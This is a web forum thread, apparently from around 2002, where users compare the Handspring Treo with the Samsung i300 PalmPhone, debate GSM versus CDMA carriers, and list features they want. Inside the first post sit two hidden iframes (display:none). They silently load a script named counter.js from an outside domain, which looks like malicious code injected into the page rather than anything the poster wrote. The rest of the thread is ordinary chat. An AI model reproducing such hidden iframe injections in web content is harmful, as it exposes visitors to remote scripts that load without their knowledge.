+ Reply to Thread

i300 to be obsolete very soon

Apparently the Treo (B&W) is coming out earlier than expected -- January. Color won't be out for a few months later, but still. It's basically an i300 with 8MB extra memory and a Blackberry. Cool. Ebay, here comes my i300.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I looked at the TREO on the handspring website before deciding on the I300. It is only available for GSM networks which in my case is VoiceStream. IMO, VoiceStream pales in comparison to SprintPCS in coverage, customer service and roaming.

Now the Visor Springboard Digital Link module coming out for Sprint is much more interesting in my opinion. A 16-bit active matrix color display with Sprint PCS telephone... Now were talking...

gsm network only

I also considered waiting for the treo, but I can only us Sprint phone service(company phone/account). I have owned three different visors and would have loved being able to continue with their product line. It is my understanding that they will only produce a gsm phone. They lost my business because of that.

Dan
    I'm looking at some pictures of the Treo right now... and I think I'll stick with my I300. Personal taste, I know, but I don't much like the big flippy bit and the overall design looks a bit kludgy. Again, personal taste. Blackberry also doesn't interest me that much, and I like my SPCS service too much.

Re: i300 to be obsolete very soon

Originally posted by masonuc
    Apparently the Treo (B&W) is coming out earlier than expected -- January. Color won't be out for a few months later, but still. It's basically an i300 with 8MB extra memory and a Blackberry. Cool. Ebay, here comes my i300.
    I thought January was the anticipated release date all along? From the moment Treo was announced, it was listed as being available in early 2002.

I will trade in my I300 for a Treo when HS releases a CDMA color version of the machine that is dual-band capable as well, which is looking about at least a year away. I really like the keyboard, get USB support back, and HS is suppose to be using an LCD that is both highly visible in direct sunlight and doesn't look like crap the rest of the time like the M505. Until then, I will be thoroughly enjoying my I300

While I'll admit I like the Treo's physical configuration a bit more than the i300's (especially the flip up earpiece née screen protector), coming out with the GSM version first was a smart move for Handspring, and probably a good thing for the PalmPhone market as a whole. It means Samsung can have the CDMA market more or less to itself for the next 6 months, and Handspring can have the GSM market to itself for the next few months too. At this point, it wouldn't be to either company's advantage to fight over the same slice of the domestic PalmPhone market. When you consider that a color 6035 is going to be out sometime soon to add even more competiton to the CDMA market, it would have been suicidal for Handspring to go the CDMA route first.

Plus, being charitable for a moment, it means my friends in the UK can get a PalmPhone too... they're jealous as hell at the moment

I personally like CDMA better as a technology, but I'll admit GSM users have one HUGE perk -- they can buy any GSM phone they want to use without having to wait for their carrier to officially support it. OK, and SIMD cards are nice too... but if I remember right, Qualcomm actually did write SIMD into the CDMA spec as an optional component that might start to appear in real phones someday...

For the next year at least, I'm satisfied with my i300. For me, the next deciding feature is going to be 3G data and SD expansion (a stereo DAC + amplifier to permit host-based MP3 playback would be nice too). If I had to choose between a smaller device and SD, I'd take SD.

I'm not sure how practical it would be, but one neat feature that just might work would be for the phone to be capable of taking advantage of the fact that speakers and microphones can actually do double-duty (performing poorly as their opposite function, but nothing a little DSP work can't overcome) and design it to let you use stereo earbuds for mp3 playback, then remove one of the earbuds and talk into it as a microphone if a call comes in... or more elegantly, design a stereo headset with a mic mounted along the wires somewhere that can do double-duty.

Getting on the fantasy list, Bluetooth or 802.11b wireless ethernet would make it complete, but there's a good chance that 3G 144k data w/packet-based billing will be so cheap as to not even be worth caring about paying for... maybe even cheap enough to justify setting up hotsync manager for network hotsyncs (I have a fixed IP) and just hotsyncing over the internet.